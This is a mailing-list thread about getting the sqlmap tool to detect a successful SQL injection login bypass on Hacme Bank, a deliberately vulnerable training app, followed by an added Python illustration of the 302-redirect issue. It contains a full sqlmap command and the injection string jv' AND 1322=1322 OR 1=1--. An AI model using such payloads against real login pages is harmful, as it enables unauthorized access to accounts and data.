Re: [sqlmap-users] sqlmap and Hacme Bank
From: Giorgio F. <gio...@gm...> - 2009-07-09 07:00:07
Hi Richard,

as far as I remember, the Hacme Bank login page replies to the user with a temporary redirect. sqlmap will see the same answer from both the false and the true injection. Btw the reason why sqlmap may not work is that it does not follow the 302 redirect to the new location specified in the response.

Having sqlmap working with Hacme Bank would be very useful for training purposes; hope to be helpful in the solution of the problem.

Giorgio

2009/6/18 Richard Jones <wp...@gm...>:
> Hi all,
>
> Sorry this ended up so long... I wanted to fully explain my situation :)
>
> I've been playing with sqlmap against Foundstone's Hacme Bank and have been
> making some progress.
>
> Here is the command I've come up with:
>
> ./sqlmap.py -u "http://192.168.200.11/HacmeBank_v2_Website/aspx/login.aspx"
> --method=POST -p "txtUserName"
> --cookie="ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5; Admin=false"
> --data="__VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit"
> -v 5 --prefix="'" --postfix=" OR 1=1--" --batch
>
> I can confirm that this command is able to gain access to the HacmeBank site
> with this crafted string: jv' AND 1322=1322 OR 1=1-- (Unicode decoded, of
> course). Some other crafted strings from sqlmap are successful as well.
>
> BUT, sqlmap doesn't seem to detect that it is successful in gaining access.
> I think the problem exists in the --regexp string... as in I can't find a
> regexp that works...
>
> From the sqlmap docs, --regexp lets the user "provide a string which is
> always present on the not injected page and on all True injected query
> pages, but that it is not on the False ones". The problem I think I am
> running into is finding a string that is present on the not injected page,
> but not on the false pages.
>
> The strings that I have been trying to match are:
> Not Injected Page: Message"></span>
> True Injected Page: Message">Line 1: Incorrect syntax near 'asdf'.</span>
> False Injected Page: Message">Invalid Login</span>
>
> My question is how is the "not injected" page detected? When watching the
> output on level 5 verbosity, I see this request. I assume this is the
> request to determine the "Not Injected" page?
>
> [11:42:28] [INFO] testing if the provided regular expression matches within
> the target URL page content
> [11:42:30] [TRAFFIC OUT] HTTP request:
> POST /HacmeBank_v2_Website/aspx/login.aspx HTTP/1.1
> Content-length: 105
> Accept-language: en-us,en;q=0.5
> Connection: Keep-Alive
> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
> User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
> Host: 192.168.200.11:80
> Cookie: ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5; Admin=false
> Content-type: application/x-www-form-urlencoded
>
> __VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit
>
> This request sends in the POST data that I provided at the command line.
> This data causes an "Invalid Login" from the login page, which is exactly
> what happens when a False injected query occurs as well. In fact, the HTML
> that comes back from this "Not Injected" request is identical to the HTML
> that comes back from a False injected page.
>
> So, in this situation, I feel that sqlmap isn't requesting the "Not
> Injected" page correctly. In my mind, that would involve a GET request,
> with no login data, to login.aspx, not a POST to that page. The GET should
> return a page that doesn't have the "Invalid Login" text that gets returned
> to a POST with invalid credentials.
>
> So, can I get sqlmap to detect the "Not Injected" page with a simple GET
> request, but then perform the sql injection using POST requests? Or is
> there something else that needs to be done? I tried changing --method to GET, as
> well as removing --method, but the GET that is sent for the "Not Injected"
> page still contains the POST data, which still results in "Invalid Login".
>
> Or am I confused on how this should work?
>
> Thanks!
>
> Richard
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
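To make the two points of the thread concrete (the baseline POST looks exactly like the false page, so no body --regexp can satisfy the documented rule, while the true page differs only by its 302 and Location header), here is an added example that is not part of the thread or of sqlmap; the responses are hand-written stand-ins and the redirect target is an assumed placeholder path:

```python
import re

# Constructed sample responses modelled on the thread (not captured traffic):
# the baseline POST and the false-injected POST both return 200 "Invalid Login";
# the true-injected POST returns a 302 whose Location (assumed placeholder path)
# would have to be followed to see the logged-in page.
LOGIN_FAILED = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    '<span id="lblMessage">Invalid Login</span>'
)
LOGIN_REDIRECT = (
    "HTTP/1.1 302 Found\r\nLocation: /EXAMPLE_PATH/loggedin.aspx\r\n\r\n"
    "<html><body>Object moved</body></html>"
)
SAMPLES = {"not_injected": LOGIN_FAILED, "true": LOGIN_REDIRECT, "false": LOGIN_FAILED}


def parse_response(raw):
    """Split a raw HTTP/1.1 response into (status code, lowercased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def regexp_usable(pattern, samples):
    """The rule quoted from the sqlmap docs: a --regexp must match the not-injected
    page and the true page but not the false page. Body text only."""
    hits = {k: re.search(pattern, parse_response(v)[2]) is not None
            for k, v in samples.items()}
    return hits["not_injected"] and hits["true"] and not hits["false"]


def redirect_fingerprint(raw):
    """Fingerprint a response by status code and redirect target, ignoring the body."""
    status, headers, _ = parse_response(raw)
    return status, headers.get("location")


def redirect_separates(samples):
    """True when status/Location alone tells the true page apart from the false one,
    which no body regexp can do while the baseline equals the false page."""
    return redirect_fingerprint(samples["true"]) != redirect_fingerprint(samples["false"])
```

Because the baseline and false samples are byte-identical, `regexp_usable` returns False for every pattern, whereas `redirect_separates` succeeds on the 302 alone.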